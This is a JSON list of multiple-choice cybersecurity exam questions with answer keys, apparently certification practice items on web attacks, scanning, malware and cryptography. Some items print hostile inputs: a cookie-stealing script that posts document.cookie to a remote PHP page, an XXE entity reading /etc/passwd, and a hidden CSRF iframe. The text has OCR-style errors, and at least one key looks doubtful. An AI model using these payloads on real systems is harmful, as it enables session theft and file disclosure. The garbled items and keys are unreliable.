"question": "A company?s Web development team has become aware of a certain type of security vulnerability in their\nWeb software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the\nsoftware requirements to disallow users from entering HTML as input into their Web application.\nWhat kind of Web application vulnerability likely exists in their software?\nA. Cross-site scripting vulnerability\nB. SQL injection vulnerability\nC. Web site defacement vulnerability\nD. Gross-site Request Forgery vulnerability\n",
"answer": "A"
},
{
"question": "Which of the following provides a security professional with most information about the system?s security\nposture?\nA. Phishing, spamming, sending trojans\nB. Social engineering, company site browsing tailgating\nC. Wardriving, warchalking, social engineering\nD. Port scanning, banner grabbing service identification\n",
"answer": "D"
},
{
"question": "BitLocker encryption has been implemented for all the Windows-based computers in an organization. You are\nconcerned that someone might lose their cryptographic key. Therefore, a mechanism was implemented to\nrecover the keys from Active Directory. What is this mechanism called in cryptography?\nA. Key archival\nB. Key escrow.\nC. Certificate rollover\nD. Key renewal\n",
"answer": "B"
},
{
"question": "What would be the purpose of running \"wget 192.168.0.15 -q -S\" against a web server?\nA. Performing content enumeration on the web server to discover hidden folders\nB. Using wget to perform banner grabbing on the webserver\nC. Flooding the web server with requests to perform a DoS attack\nD. Downloading all the contents of the web page locally for further examination\n",
"answer": "B"
},
{
"question": "Judy created a forum, one day. she discovers that a user is posting strange images without writing comments.\nShe immediately calls a security expert, who discovers that the following code is hidden behind those images:\n<script>\ndocument.writef<img src=\"https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ \" />);\n</script>\nWhat issue occurred for the users who clicked on the image?\nA. The code inject a new cookie to the browser.\nB. The code redirects the user to another site.\nC. The code is a virus that is attempting to gather the users username and password.\nD. This php file silently executes the code and grabs the users session cookie and session ID.\n",
"answer": "D"
},
{
"question": "Stella, a professional hacker, performs an attack on web services by exploiting a vulnerability that provides\nadditional routing information in the SOAP header to support asynchronous communication. This further\nallows the transmission of web-service requests and response messages using different TCP connections.\nWhich of the following attack techniques is used by Stella to compromise the web services?\nA. XML injection\nB. WS-Address spoofing\nC. SOAPAction spoofing\nD. Web services parsing attacks\n",
"answer": "B"
},
{
"question": "If executives are found liable for not properly protecting their company?s assets and information systems, what\ntype of law would apply in this situation?\nA. Criminal\nB. International\nC. Common\nD. Civil\n",
"answer": "D"
},
{
"question": "An attacker changes the profile information of a particular user (victim) on the target website. The attacker\nuses this string to update the victim?s profile to a text file and then submit the data to the attacker?s database.\n<\niframe src=??http://www.vulnweb.com/updateif.php?? style=??display:none??\n> < /iframe >\nWhat is this type of attack (that can use either HTTP GET or HTTP POST) called?\nA. Browser Hacking\nB. Cross-Site Scripting\nC. SQL Injection\nD. Cross-Site Request Forgery\n",
"answer": "D"
},
{
"question": "You start performing a penetration test against a specific website and have decided to start from grabbing all\nthe links from the main page.\nWhat Is the best Linux pipe to achieve your milestone?\nA. dirb https://site.com | grep \"site\"\nB. curl -s https://sile.com | grep ??< a href-\\?http\" | grep \"Site-com- | cut -d \"V\" -f 2\nC. wget https://stte.com | grep \"< a href=\\*http\" | grep \"site.com\"\nD. wgethttps://site.com | cut-d\"http-\n",
"answer": "C"
},
{
"question": "Upon establishing his new startup, Tom hired a cloud service provider (CSP) but was dissatisfied with their\nservice and wanted to move to another CSP.\nWhat part of the contract might prevent him from doing so?\nA. Virtualization\nB. Lock-in\nC. Lock-down\nD. Lock-up\n",
"answer": "B"
},
{
"question": "In both pharming and phishing attacks, an attacker can create websites that look similar to legitimate sites with\nthe intent of collecting personal identifiable information from its victims.\nWhat is the difference between pharming and phishing attacks?\nA. In a pharming attack, a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a phishing attack, an attacker provides the victim with a URL that is either misspelled or looks similar to the actual websites domain name\nB. In a phishing attack, a victim is redirected to a fake website by modifying their host configuration file or by exploiting vulnerabilities in DNS. In a pharming attack, an attacker provides the victim with a URL that is either misspelled or looks very similar to the actual websites domain name\nC. Both pharming and phishing attacks are purely technical and are not considered forms of social engineering\nD. Both pharming and phishing attacks are identical\n",
"answer": "A"
},
{
"question": "Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity\nand navigate anonymously to obtain sensitive/hidden information about official government or federal\ndatabases. After gathering the Information, he successfully performed an attack on the target government\norganization without being traced. Which of the following techniques is described in the above scenario?\nA. Dark web footprinting\nB. VoIP footpnnting\nC. VPN footprinting\nD. website footprinting\n",
"answer": "A"
},
{
"question": "When considering how an attacker may exploit a web server, what is web server footprinting?\nA. When an attacker implements a vulnerability scanner to identify weaknesses\nB. When an attacker creates a complete profile of the site's external links and file structures\nC. When an attacker gathers system-level data, including account details and server names\nD. When an attacker uses a brute-force attack to crack a web-server password\n",
"answer": "B"
},
{
"question": "Harris is attempting to identify the OS running on his target machine. He inspected the initial TTL in the IP\nheader and the related TCP window size and obtained the following results:\nTTL: 64 Window Size: 5840\nWhat is the OS running on the target machine?\nA. Solaris OS\nB. Windows OS\nC. Mac OS\nD. Linux OS\n",
"answer": "D"
},
{
"question": "Which protocol is used for setting up secure channels between two devices, typically in VPNs?\nA. PEM\nB. ppp\nC. IPSEC\nD. SET\n",
"answer": "C"
},
{
"question": "Peter, a system administrator working at a reputed IT firm, decided to work from his home and login remotely.\nLater, he anticipated that the remote connection could be exposed to session hijacking. To curb this possibility,\nhe implemented a technique that creates a safe and encrypted tunnel over a public network to securely send\nand receive sensitive information and prevent hackers from decrypting the data flow between the endpoints.\nWhat is the technique followed by Peter to send files securely through a remote connection?\nA. DMZ\nB. SMB signing\nC. VPN\nD. Switch network\n",
"answer": "C"
},
{
"question": "Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the\nfollowing input?\n<!DOCTYPE blah [ < IENTITY trustme SYSTEM \"file:///etc/passwd\" > ] >\nA. XXE\nB. SQLi\nC. IDOR\nD. XXS\n",
"answer": "A"
},
{
"question": "While performing an Nmap scan against a host, Paola determines the existence of a firewall. In an attempt to\ndetermine whether the firewall is stateful or stateless, which of the following options would be best to use?\nA. -sA\nB. -sX\nC. -sT\nD. -sF\n",
"answer": "A"
},
{
"question": "What type of virus is most likely to remain undetected by antivirus software?\nA. Cavity virus\nB. Stealth virus\nC. File-extension virus\nD. Macro virus\n",
"answer": "B"
},
{
"question": "Which of the following types of SQL injection attacks extends the results returned by the original query,\nenabling attackers to run two or more statements if they have the same structure as the original one?\nA. Error-based injection\nB. Boolean-based blind SQL injection\nC. Blind SQL injection\nD. Union SQL injection\n",
"answer": "D"
},
{
"question": "To hide the file on a Linux system, you have to start the filename with a specific character. What is the\ncharacter?\nA. Exclamation mark (!)\nB. Underscore (_)\nC. Tilde H\nD. Period (.)\n",
"answer": "D"
},
{
"question": "Bob, your senior colleague, has sent you a mail regarding a deal with one of the clients. You are requested to\naccept the offer and you oblige. After 2 days, Bab denies that he had ever sent a mail. What do you want to\n??know?? to prove yourself that it was Bob who had send a mail?\nA. Non-Repudiation\nB. Integrity\nC. Authentication\nD. Confidentiality\n",
"answer": "A"
},
{
"question": "You want to analyze packets on your wireless network. Which program would you use?\nA. Wireshark with Airpcap\nB. Airsnort with Airpcap\nC. Wireshark with Winpcap\nD. Ethereal with Winpcap\n",
"answer": "A"
},
{
"question": "Henry is a penetration tester who works for XYZ organization. While performing enumeration on a client\norganization, he queries the DNS server for a specific cached DNS record. Further, by using this cached\nrecord, he determines the sites recently visited by the organization's user. What is the enumeration technique\nused by Henry on the organization?\nA. DNS zone walking\nB. DNS cache snooping\nC. DNS SEC zone walking\nD. DNS cache poisoning\n",
"answer": "B"
},
{
"question": "Insecure direct object reference is a type of vulnerability where the application does not verify if the user is\nauthorized to access the internal object via its name or key. Suppose a malicious user Rob tries to get access to\nthe account of a benign user Ned.\nWhich of the following requests best illustrates an attempt to exploit an insecure direct object reference\nvulnerability?\nA. ?GET /restricted/goldtransfer?to=Rob&from=1 or 1=1? HTTP/1.1Host: westbank.com?\nB. ?GET /restricted/\\r\\n\\%00account%00Ned%00access HTTP/1.1 Host: westbank.com?\nC. ?GET /restricted/accounts/?name=Ned HTTP/1.1 Host westbank.com?\nD. ?GET /restricted/ HTTP/1.1 Host: westbank.com\n",
"answer": "C"
},
{
"question": "An organization has automated the operation of critical infrastructure from a remote location. For this purpose,\nall the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure\nthe reliability of industrial networks, and reduce downtime and service disruption, the organization deckled to\ninstall an OT security tool that further protects against security incidents such as cyber espionage, zero-day\nattacks, and malware. Which of the following tools must the organization employ to protect its critical\ninfrastructure?\nA. Robotium\nB. BalenaCloud\nC. Flowmon\nD. IntentFuzzer\n",
"answer": "C"
},
{
"question": "Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an\nattacker, noticed her activities several times and sent a fake email containing a deceptive page link to her\nsocial media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link\nand logged in to that page using her valid credentials. Which of the following tools is employed by Clark to\ncreate the spoofed email?\nA. PyLoris\nB. Slowloris\nC. Evilginx\nD. PLCinject\n",
"answer": "C"
},
{
"question": "You are using a public Wi-Fi network inside a coffee shop. Before surfing the web, you use your VPN to\nprevent intruders from sniffing your traffic. If you did not have a VPN, how would you identify whether\nsomeone is performing an ARP spoofing attack on your laptop?\nA. You should check your ARP table and see if there is one IP address with two different MAC addresses.\nB. You should scan the network using Nmap to check the MAC addresses of all the hosts and look for duplicates.\nC. You should use netstat to check for any suspicious connections with another IP address within the LAN.\nD. You cannot identify such an attack and must use a VPN to protect your traffic, r\n",
"answer": "A"
},
{
"question": "To create a botnet. the attacker can use several techniques to scan vulnerable machines. The attacker first\ncollects Information about a large number of vulnerable machines to create a list. Subsequently, they infect the\nmachines. The list Is divided by assigning half of the list to the newly compromised machines. The scanning\nprocess runs simultaneously. This technique ensures the spreading and installation of malicious code in little\ntime.\nWhich technique is discussed here?\nA. Hit-list-scanning technique\nB. Topological scanning technique\nC. Subnet scanning technique\nD. Permutation scanning technique\n",
"answer": "A"
},
{
"question": "Mason, a professional hacker, targets an organization and spreads Emotet malware through malicious script.\nAfter infecting the victim's device. Mason further used Emotet to spread the infection across local networks\nand beyond to compromise as many machines as possible. In this process, he used a tool, which is a\nself-extracting RAR file, to retrieve information related to network resources such as writable share drives.\nWhat is the tool employed by Mason in the above scenario?\nA. NetPass.exe\nB. Outlook scraper\nC. WebBrowserPassView\nD. Credential enumerator\n",
"answer": "D"
},
{
"question": "Elante company has recently hired James as a penetration tester. He was tasked with performing enumeration\non an organization's network. In the process of enumeration, James discovered a service that is accessible to\nexternal sources. This service runs directly on port 21. What is the service enumerated byjames in the above\nscenario?\nA. Border Gateway Protocol (BGP)\nB. File Transfer Protocol (FTP)\nC. Network File System (NFS)\nD. Remote procedure call (RPC)\n",
"answer": "B"
},
{
"question": "An unauthorized individual enters a building following an employee through the employee entrance after the\nlunch rush. What type of breach has the individual just performed?\nA. Reverse Social Engineering\nB. Tailgating\nC. Piggybacking\nD. Announced\n",
"answer": "B"
},
{
"question": "By performing a penetration test, you gained access under a user account. During the test, you established a\nconnection with your own machine via the SMB service and occasionally entered your login and password in\nplaintext.\nWhich file do you have to clean to clear the password?\nA. .X session-log\nB. .bashrc\nC. .profile\nD. .bash_history\n",
"answer": "D"
},
{
"question": "Websites and web portals that provide web services commonly use the Simple Object Access Protocol\n(SOAP).\nWhich of the following is an incorrect definition or characteristics of the protocol?\nA. Exchanges data between web services\nB. Only compatible with the application protocol HTTP\nC. Provides a structured model for messaging\nD. Based on XML\n",
"answer": "B"
},
{
"question": "Attacker Simon targeted the communication network of an organization and disabled the security controls of\nNetNTLMvl by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and\nRestrictSendingNTLMTraffic. He then extracted all the non-network logon tokens from all the active\nprocesses to masquerade as a legitimate user to launch further attacks. What is the type of attack performed by\nSimon?\nA. Internal monologue attack\nB. Combinator attack\nC. Rainbow table attack\nD. Dictionary attack\n",
"answer": "A"
},
{
"question": "Which of the following Bluetooth hacking techniques does an attacker use to send messages to users without\nthe recipient?s consent, similar to email spamming?\nA. Bluesmacking\nB. BlueSniffing\nC. Bluejacking\nD. Bluesnarfing\n",
"answer": "C"
},
{
"question": "A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much\ninformation can be obtained from the firm?s public facing web servers. The engineer decides to start by using\nnetcat to port 80.\nThe engineer receives this output:\nHTTP/1.1 200 OK\nServer: Microsoft-IIS/6\nExpires: Tue, 17 Jan 2011 01:41:33 GMT\nDate: Mon, 16 Jan 2011 01:41:33 GMT\nContent-Type: text/html\nAccept-Ranges: bytes\nLast Modified: Wed, 28 Dec 2010 15:32:21 GMT\nETag:?b0aac0542e25c31:89d?\nContent-Length: 7369\nWhich of the following is an example of what the engineer performed?\nA. Banner grabbing\nB. SQL injection\nC. Whois database query\nD. Cross-site scripting\n",
"answer": "A"
},
{
"question": "Which of the following Metasploit post-exploitation modules can be used to escalate privileges on Windows\nsystems?\nA. getsystem\nB. getuid\nC. keylogrecorder\nD. autoroute\n",
"answer": "A"
},
{
"question": "What type of a vulnerability/attack is it when the malicious person forces the user?s browser to send an\nauthenticated request to a server?\nA. Session hijacking\nB. Server side request forgery\nC. Cross-site request forgery\nD. Cross-site scripting\n",
"answer": "C"
},
{
"question": "Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a\nsignature-based IDS?\nA. Produces less false positives\nB. Can identify unknown attacks\nC. Requires vendor updates for a new threat\nD. Cannot deal with encrypted network traffic\n",
"answer": "B"
},
{
"question": "Bill has been hired as a penetration tester and cyber security auditor for a major credit card company. Which\ninformation security standard is most applicable to his role?\nA. FISMA\nB. HITECH\nC. PCI-DSS\nD. Sarbanes-OxleyAct\n",
"answer": "C"
},
{
"question": "When conducting a penetration test, it is crucial to use all means to get all available information about the\ntarget network. One of the ways to do that is by sniffing the network. Which of the following cannot be\nperformed by the passive network sniffing?\nA. Identifying operating systems, services, protocols and devices\nB. Modifying and replaying captured network traffic\nC. Collecting unencrypted information about usernames and passwords\nD. Capturing a network traffic for further analysis\n",
"answer": "B"
},
{
"question": "Dayn, an attacker, wanted to detect if any honeypots are installed in a target network. For this purpose, he used\na time-based TCP fingerprinting method to validate the response to a normal computer and the response of a\nhoneypot to a manual SYN request. Which of the following techniques is employed by Dayn to detect\nhoneypots?\nA. Detecting honeypots running on VMware\nB. Detecting the presence of Honeyd honeypots\nC. Detecting the presence of Snort_inline honeypots\nD. Detecting the presence of Sebek-based honeypots\n",
"answer": "C"
},
{
"question": "Kate dropped her phone and subsequently encountered an issue with the phone's internal speaker. Thus, she is\nusing the phone's loudspeaker for phone calls and other activities. Bob, an attacker, takes advantage of this\nvulnerability and secretly exploits the hardware of Kate's phone so that he can monitor the loudspeaker's\noutput from data sources such as voice assistants, multimedia messages, and audio files by using a malicious\napp to breach speech privacy. What is the type of attack Bob performed on Kate in the above scenario?\nA. Man-in-the-disk attack\nB. aLTEr attack\nC. SIM card attack\nD. Spearphone attack\n",
"answer": "D"
},
{
"question": "Cross-site request forgery involves:\nA. A request sent by a malicious user from a browser to a server\nB. Modification of a request by a proxy between client and server\nC. A browser making a request to a server without the user?s knowledge\nD. A server making a request to another server without the user?s knowledge\n",
"answer": "C"
},
{
"question": "Which type of attack attempts to overflow the content-addressable memory (CAM) table in an Ethernet\nswitch?\nA. Evil twin attack\nB. DNS cache flooding\nC. MAC flooding\nD. DDoS attack\n",
"answer": "C"
},
{
"question": "How can rainbow tables be defeated?\nA. Use of non-dictionary words\nB. All uppercase character passwords\nC. Password salting\nD. Lockout accounts under brute force password cracking attempts\n",
"answer": "C"
},
{
"question": "Miley, a professional hacker, decided to attack a target organization's network. To perform the attack, she used\na tool to send fake ARP messages over the target network to link her MAC address with the target system's IP\naddress. By performing this, Miley received messages directed to the victim's MAC address and further used\nthe tool to intercept, steal, modify, and block sensitive communication to the target system. What is the tool\nemployed by Miley to perform the above attack?\nA. Gobbler\nB. KDerpNSpoof\nC. BetterCAP\nD. Wireshark\n",
"answer": "C"
},
{
"question": "The network in ABC company is using the network address 192.168.1.64 with mask 255.255.255.192. In the\nnetwork the servers are in the addresses 192.168.1.122, 192.168.1.123 and 192.168.1.124. An attacker is\ntrying to find those servers but he cannot see them in his scanning. The command he is using is: nmap\n192.168.1.64/28.\nWhy he cannot see the servers?\nA. He needs to add the command ??ip address?? just before the IP address\nB. He needs to change the address to 192.168.1.0 with the same mask\nC. He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that range\nD. The network must be dawn and the nmap command and IP address are ok\n",
"answer": "C"
},
{
"question": "Ben purchased a new smartphone and received some updates on it through the OTA method. He received two\nmessages: one with a PIN from the network operator and another asking him to enter the PIN received from\nthe operator. As soon as he entered the PIN, the smartphone started functioning in an abnormal manner. What\nis the type of attack performed on Ben in the above scenario?\nA. Advanced SMS phishing\nB. Bypass SSL pinning\nC. Phishing\nD. Tap 'n ghost attack\n",
"answer": "A"
},
{
"question": "Attempting an injection attack on a web server based on responses to True/False QUESTION NO:s is called\nwhich of the following?\nA. Compound SQLi\nB. Blind SQLi\nC. Classic SQLi\nD. DMS-specific SQLi\n",
"answer": "B"
},
{
"question": "You have compromised a server and successfully gained a root access. You want to pivot and pass traffic\nundetected over the network and evade any possible Intrusion Detection System. What is the best approach?\nA. Use Alternate Data Streams to hide the outgoing packets from this server.\nB. Use HTTP so that all traffic can be routed vis a browser, thus evading the internal Intrusion Detection Systems.\nC. Install Cryptcat and encrypt outgoing packets from this server.\nD. Install and use Telnet to encrypt all outgoing traffic from this server.\n",
"answer": "C"
},
{
"question": "John, a professional hacker, decided to use DNS to perform data exfiltration on a target network, in this\nprocess, he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using\nthis technique. John successfully injected malware to bypass a firewall and maintained communication with\nthe victim machine and C&C server. What is the technique employed by John to bypass the firewall?\nA. DNS cache snooping\nB. DNSSEC zone walking\nC. DNS tunneling method\nD. DNS enumeration\n",
"answer": "C"
},
{
"question": "Which iOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after\neach successive reboot?\nA. Tethered jailbreaking\nB. Semi-tethered jailbreaking\nC. Untethered jailbreaking\nD. Semi-Untethered jailbreaking\n",
"answer": "C"
},
{
"question": "You want to do an ICMP scan on a remote computer using hping2. What is the proper syntax?\nA. hping2 host.domain.com\nB. hping2 --set-ICMP host.domain.com\nC. hping2 -i host.domain.com\nD. hping2 -1 host.domain.com\n",
"answer": "D"
},
{
"question": "You have been authorized to perform a penetration test against a website. You want to use Google dorks to\nfootprint the site but only want results that show file extensions. What Google dork operator would you use?\nA. filetype\nB. ext\nC. inurl\nD. site\n",
"answer": "A"
},
{
"question": "Firewalls are the software or hardware systems that are able to control and monitor the traffic coming in and\nout the target network based on pre-defined set of rules. Which of the following types of firewalls can protect\nagainst SQL injection attacks?\nA. Data-driven firewall\nB. Packet firewall\nC. Web application firewall\nD. Stateful firewall\n",
"answer": "C"
},
{
"question": "Jane is working as a security professional at CyberSol Inc. She was tasked with ensuring the authentication\nand integrity of messages being transmitted in the corporate network. To encrypt the messages, she\nimplemented a security model in which every user in the network maintains a ring of public keys. In this\nmodel, a user needs to encrypt a message using the receiver's public key, and only the receiver can decrypt the\nmessage using their private key. What is the security model implemented by Jane to secure corporate\nmessages?\nA. Zero trust network\nB. Transport Layer Security (TLS)\nC. Secure Socket Layer (SSL)\nD. Web of trust (WOT)\n",
"answer": "D"
},
{
"question": "A DDOS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the\nweb infrastructure or applications. Upon receiving a partial request, the target servers opens multiple\nconnections and keeps waiting for the requests to complete.\nWhich attack is being described here?\nA. Desynchronization\nB. Slowloris attack\nC. Session splicing\nD. Phlashing\n",
"answer": "B"
},
{
"question": "A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the\nEquifax data breach that affected 143 million customers. A fix was available from the software vendor for\nseveral months prior 10 the Intrusion. This Is likely a failure in which of the following security processes?\nA. vendor risk management\nB. Security awareness training\nC. Secure deployment lifecycle\nD. Patch management\n",
"answer": "D"
},
{
"question": "Mirai malware targets loT devices. After infiltration, it uses them to propagate and create botnets that then\nused to launch which types of attack?\nA. MITM attack\nB. Birthday attack\nC. DDoS attack\nD. Password attack\n",
"answer": "C"
},
{
"question": "Thomas, a cloud security professional, is performing security assessment on cloud services to identify any\nloopholes. He detects a vulnerability in a bare-metal cloud server that can enable hackers to implant malicious\nbackdoors in its firmware. He also identified that an installed backdoor can persist even if the server is\nreallocated to new clients or businesses that use it as an laaS.\nWhat is the type of cloud attack that can be performed by exploiting the vulnerability discussed in the above\nscenario?\nA. Man-in-the-cloud (MITC) attack\nB. Cloud cryptojacking\nC. Cloudborne attack\nD. Metadata spoofing attack\n",
"answer": "C"
},
{
"question": "Tony wants to integrate a 128-bit symmetric block cipher with key sizes of 128,192, or 256 bits into a software\nprogram, which involves 32 rounds of computational operations that include substitution and permutation\noperations on four 32-bit word blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. Which of the\nfollowing algorithms includes all the above features and can be integrated by Tony into the software program?\nA. TEA\nB. CAST-128\nC. RC5\nD. serpent\n",
"answer": "D"
}
]